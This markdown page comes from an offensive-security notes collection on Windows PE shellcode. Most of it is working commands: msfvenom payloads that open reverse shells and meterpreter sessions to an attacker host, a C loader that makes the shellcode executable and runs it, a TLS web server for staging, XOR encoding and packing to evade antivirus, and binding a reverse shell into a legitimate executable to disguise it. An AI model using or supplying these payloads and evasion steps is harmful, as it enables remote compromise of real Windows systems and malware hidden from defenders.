killchain-compendium/Exploits/Windows/Shellcode.md

PE Shellcode

General PE Information

• [PE structure](../../../reverse engineering/windows/portable-executable.md)

Inserting Shellcode

Multiple sections inside the PE can be used to insert the shellcode. This is defined by how the shellcode variable is initialized. When the shellcode is defined as

• A local variable inside the main function it will be stored in the .text section
• A global variable it will be stored in the .data section
• A raw binary in an icon image and referencing it will store it in the .rsrc section
• A custom data section it is stored in this unusual section

Crafting Shellcode

• Use msfvenom to generate shellcode which executes the calculator

msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f c -o stage.c

• Fill in the the missing parts to make it a valid c file

sed -i '1s/^/#include <windows.h>\n/' stage.c
sed -i 's/=/= {/' stage.c
sed -i 's/;/};/' stage.c
echo -e "int main (void) {\n\tDWORD _protect;\n\tVirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READ, &_protect);\n\tint (*shellcode)() = (int(*)())(void *)buf;\n\tshellcode();\n\treturn 0;\n}" >> stage.c

• Compile it

i686-w64-mingw32-gcc stage.c -o vcalc.exe

Compile C#

The Microsoft Visual C# compiler is called via

csc file.cs

Staged C2

• The stage on the target needs to download further parts of the shell into memory
• These parts may be generated in one of the following ways (all of them will be found through AV)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shell.bin -b '\x00\x0a\x0d'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shellcode.bin -b '\x00' -e x86/shikata_ga_nai -i 3 -f csharp
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f exe --encrypt xor --encrypt-key "verysecretkey" -o xored-revshell.exe

• Generate certificate for the webserver

openssl req -new -x509 -keyout webserver.pem -out webserver.pem -days 365 -nodes

• Start the webserver

sudo python -c "import http.server, ssl;server_address=('0.0.0.0',443);httpd=http.server.HTTPServer(server_address,http.server.SimpleHTTPRequestHandler);httpd.socket=ssl.wrap_socket(httpd.socket,server_side=True,certfile='webserver.pem',ssl_version=ssl.PROTOCOL_TLSv1_2);httpd.serve_forever()"

Generate Custom Shellcode

• The target is to bypass the AV

Xor and Encode

msfvenom LHOST=$ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp

• Xor and encode the payload, decode the payload on target before it is executed

Packer

• Compress and obfuscate shellcode inside a binary
• Obviously, an unpacker is needed inside the binary in addition to the packed code
• mkaring's confuserx
  • Select the directory and binary
  • Go to settings, use packet and create Rules
  • Edit the rule as well
  • Go to Protect and click the button

Binding

• Used to merge binaries
• Shellcode will be merged into a legitimate PE and run as an additional thread

msfvenom -x legitimate.exe -k -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4711 -f exe -o notsolegitimate.exe

• Binded PEs need some disguising as well

Tools & Tipps

• hasherezade's PE-bear gives an overview of the PE's sections
• asmtutor.com
• mvelazc0's staged payload